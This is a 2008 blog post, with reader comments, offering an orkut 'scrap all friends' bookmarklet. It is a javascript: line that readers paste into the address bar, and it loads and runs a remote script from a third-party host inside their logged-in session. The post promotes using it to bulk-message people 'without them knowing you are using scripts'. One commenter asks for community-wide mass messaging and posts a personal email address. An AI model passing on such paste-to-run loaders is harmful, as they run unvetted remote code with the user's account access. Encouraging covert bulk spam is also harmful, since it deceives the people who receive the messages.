Monday, January 28, 2008

Scrap all your orkut friends... AD-FREE ! ! !

Since few weeks, there has been a flood of javascripts offering 'scrap-all-friends' utility. My investigation concluded all the codes are same, just a change of links to the community being a bit different. I made my own version of the code with no such useless links. It can be found here.


javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://h1.ripway.com/kraghuram/scrap.js ';void(0)

Just Copy and Paste the aboue Code into your address Bar. Then wait for a few seconds for loading. U will get a screen where u can type in your message ,after typing the message click send scraps , u will get a dialog box ,clk ok...

ENJOY SCRAPPING YOUR FRIENDS, WITHOUT THEM KNOWING YOU ARE USING SCRIPTS....
NJOY....

4 comments:

  1. nice!
    i too wanted to get rid of the links..... thanks man!

    ReplyDelete
  2. gr8 script man!!

    people often ignore comon scraps wen dey c d link...buh now dey will c dem..read d scrap n also not noe weder itz a common scrap...gr8 dude...thnkz ..

    ReplyDelete
  3. Hey, gret work !!
    Can you provide me a way to scrap all the members in a particular community. Actually I am an HR consultant. Right now I visit the profiles of all the members in a community and leave scrap on them manually. Can this be automated with some script. I want that in one go, I can scrap all the members of that community.

    It will be great help for me, if you can provide me a way to do this. You can contact me at gauravd.chd@gmail.com

    Thanks !!

    ReplyDelete
  4. Awesome and interesting article. Great things you've always shared with us. Thanks. Just continue composing this kind of post.

    ReplyDelete